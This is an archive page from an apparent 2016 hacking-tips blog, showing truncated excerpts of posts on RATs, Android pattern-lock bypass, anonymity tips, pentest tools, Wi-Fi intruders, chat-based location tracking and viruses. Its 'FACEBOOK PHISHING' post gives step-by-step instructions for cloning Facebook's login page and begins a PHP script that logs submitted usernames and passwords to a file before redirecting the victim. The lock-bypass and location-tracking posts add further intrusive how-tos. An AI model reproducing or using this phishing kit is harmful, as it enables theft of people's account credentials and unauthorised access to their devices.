Posts

Showing posts from April, 2016

RAT

What Is Remote Administration Tool? A Remote Administration Tool (RAT) is a piece of software that allows a remote “Operator” to control a system as if he has physical access to that system. While Desktop Sharing and Remote Administration have many legal uses, “RAT” software is usually associated with the criminal or malicious activities such as controlling remote PC’s, stealing victims data, deleting or editing some files. One can infect someone else by sending them a file called “Server”. If and when this server file is opened, it burrows itself deep in the system and starts to run in the background. Further, it may also send the attacker a message every time it’s active like when a computer is turned on. How To Spread Remote Administration Tool? Some RATs can spread over P2P (peer to peer) file sharing services (Torrents mostly), messenger and email spams (MSN, Skype, AIM, etc.) while other may tag along hiding behind some other software. The user installs som...

Unlock Pattern Lock On Android Without Losing Data

Image
Method 1st:- Unlock Pattern Lock On Android Without Losing Data Download Aroma File Manager. You android device either locked by pattern lock or password lock. A memory card for android device. Step 1. After downloading  Aroma File Manager,  place it in your memory card (SD card). Insert the memory card into your locked android device. Step 2. Open Stock Recovery Mode with reboot your android device and pressing Power Key and Volume up key simultaneously. Different phones may be have different methods to open stock recovery mode so if you face any problem Google it. Step 3. After entering into recovery mode use Volume+ and Volume- buttons to scroll up and down. For select use middle button. Step 4. From there click on “Install Zip from SD Card” and give a path to install “Aroma File Manager” from SD card. Step 5. After installing, it will open in recovery mode. Step 6. From the Aroma File Manager navigate to settings >> go to bottom and cli...

21 Tips and Tricks to be Untraceable and Invisible in Cyber Space

21 Tips and Tricks to be Untraceable and Invisible in Cyber Space 1. INCOGNITO This is perhaps one of the most basic privacy options that just about anyone can take advantage of. The top four most popular browsers - Google Chrome, Internet Explorer, Mozilla Firefox and Safari - have a private browsing mode, which can be found in their respective settings menus. With private browsing activated, your browser will not store cookies or internet history on your computer. This has very limited uses and is perhaps really only effective at hiding your browsing history from your significant other, siblings or parents. Private browsing does not securely hide your identity or browsing activities beyond your local machine as your IP address can still be tracked. 2. SECURE WEBMAIL WITH EXTENSIONS If you’re using a popular webmail service, such as Gmail or Yahoo Mail, and you don’t or can’t make the switch to a more secure service, then consider installing Mailvelope. Mailvelop...

Hackers are three types

Image
Hackers are three types:- 1. White hat hacker 2. Gray hat hacker 3. Black hat hacker What Is A White Hat Hacker? A hacker can be a wiz kid who spends too much time with computers and suddenly finds himself submerged in the world of cyber-security or criminal conspirators. On the other hand, he can be a master criminal who wants to obtain huge amounts of money for him, or even worse, dominate the world. In the movie Matrix, the concept of hackers changed a bit. Although the agents of the Matrix considered them terrorists, the truth is that they were rebels fighting for the liberty of humanity. Things do not need to reach that extreme, though. We are not at war with intelligent ma chines so that kind of scenario is a bit dramatic. Therefore, a hacker is an individual who is capable of modifying computer hardware, or software. They made their appearance before the advent of computers, when determined individuals were fascinated with the possibility o...

How To Control ‪#‎YouTube‬ In PC With Your Smartphone Without Any App

Image
How To Control ‪#‎ YouTube‬ In PC With Your Smartphone Without Any App Suppose you are chatting with your girlfriend and watching a movie or video on YouTube alongside, but you don’t want to touch your PC every time for pausing, reversing, forwarding, increasing or decreasing volume: what to do in that situation? You can obviously control your PC with your smartphone using apps, but wouldn’t it be great if you could just save some storage on your smartphone? First you need con nect your smartphone and PC on a same network and then open the Leanback version of YouTube site i.e. YouTube.com/tv , and click on the three horizontal dots located at the left side. Now scroll down and go to Settings then click on PAIR DEVICE and copy the 12 digit code. Now open the YouTube app on your smartphone and click the three vertical dots in the upper right corner of the app and select Settings. You will see few options there, click on Connected TVs and then Add a TV. Enter the 12 digi...

Here are the top hacking tools for 2016 used by hackers and pentesters worldwide

Here are the top hacking tools for 2016 used by hackers and pentesters worldwide Nmap : Nmap is an abbreviation of ‘Network Mapper’, which is a very well known free open source hackers tool. Nmap is used for network discovery and security auditing. Literally thousands of system admins all around the world will use nmap for network inventory, check for open ports, manage service upgrade schedules, and monitor host or service uptime. Nmap, as a tool uses raw IP packets in creative ways to determine what hosts are available on the network, what services (application name and version) those hosts are providing information about, what operating systems (fingerprinting) and what type and version of packet filters/ firewalls are being used by the target. There are dozens of benefits of using nmap, one of which is that fact that the admin user is able to determine whether the network (and associated nodes) need patching. Acutenix Web Vulnerability Scanner : Find out if your...

5 ways to find what Google knows about you

Image
5 ways to find what Google knows about you Since Google has become the synonyms with Internet, the whole science of advertisement has somewhat changed. But one thing has remained unaffected-Threats of your personal information being leaked or sold to some ad-company. We are here with some ways you can know upto which extent your details are being kept. 1.Account Login Details Using Google you can actually check all your account login details that will include all the device details with which your account is logged in. And also the location of the device where your account is logged in. And your can use this service at the page Google Security with your account. 2.Google Dashboard This is one of the cool feature of Google where you can see all the summary of your Google account in a single place. This will include all yours calendar records, your contacts details, your sync bookmark, your cloud printed documents and lots of things that you will get to know whe...

FACEBOOK PHISHING !!

FACEBOOK PHISHING !! Steps to create a phishing page 1.Go to the Facebook page ,and then right click on the page, u will see the option view source page,click on that http://goo.gl/HxrFON 2.now a new tab will open which contain a source code,Select all the stuff and paste it in a notepad. http://goo.gl/eyYQsr 3.Now open the notepad and press CTRL+F,and type ACTION 4.You will have to find a text which looks like .. action=" https://www.facebook.com/login.php?login_attempt=1 " 5.delete all the text written in red colour and instead of it write post.php.then it will look like... action="post.php" 6.Now save it on your desktop with the name index.htm,not index.html,remember. 7.Now your phishing page is ready.it will look like a pic given below . http://goo.gl/UNueUo 8.Open a new notepad and save the given data with the name post.php. <?php header ('Location: http://www.facebook.com/ '); $handle = fopen("usernames.txt", "a...

How To Stop Wi-Fi Stealing And Catch That Person

Image
How To Stop Wi-Fi Stealing And Catch That Person Wifi stealing is the common problem we face in our everyday life. It even happens without our knowledge. However the control is in our hand and we can stop wifi stealing using the admin panel of our wifi router. Often we are unable to locate an uninvited user who uses our Wi-Fi. If someone uses our wifi without our knowledge, that would be termed as wifi stealing. Whatever be the case, to be on the safer side, we must know who is using my Wi-Fi without my permission and how can we stop them. So, here are the steps on – How To Stop Wifi Stealing And Catch That Person: Login to your router. Different routers support different login styles. So, I am listing a few of the logging in style, out of these, one might work for you: Punch in the IP address of your router in your browser address bar directly like 192.168.0.1 or 192.168.1.1 If the above address does not work, you can also try routerlogin.com and it will redi...

TRACE UR FRIENDS LOCATION WHILE CHATING

Image
TRACE UR FRIENDS LOCATION WHILE CHATING: There are often such situations when one want to track the location of the person you’re chatting to. Not always, but sometimes it’s really urgent. There are some different methods that you can use according to your convenience but remember one thing that, as the complex is the method, better will be the results. Here, we have three best methods for helping you out in tracking the location of any person by chatting on facebook and other social networking websites. So, Just don’t only read out but also understand all the method discussed below and use any of them to check out the location of any person by chatting with them on social sites: Method#1 Track Location By Chatting On Facebook or any other Social Sites:  This is fast, but a little tricky method as well as pretty straight forward. Many people have used this method and succeeded. So, you need to be friends with the person you want to ...

Virology – Understanding Computer Viruses

Image
Virology – Understanding Computer Viruses On contrary to popular belief, Hacker’s own machines are often more vulnerable to attacks than the average user. This is especially true of those who are new to the world of hacking because of their more frequent access to remote machines, dodgy forums, open administrative privileges on their own machines and inexperience in covering their tracks etc. Further, those who are experienced often take advantage of the ones who are in the learning stage, trying to get into this field. So, for a newbie hacker, it is of vital importance to learn how to protect themselves to avoid being consumed by their own curiosity by Understanding Computer Viruses. In this dog-eat-dog world, any kind of safety is an illusion unless proven otherwise. Understanding Computer Viruses Computer Viruses are the malware program that, when executed, replicates by inserting copies of itself (possibly modified) into other computer programs, data ...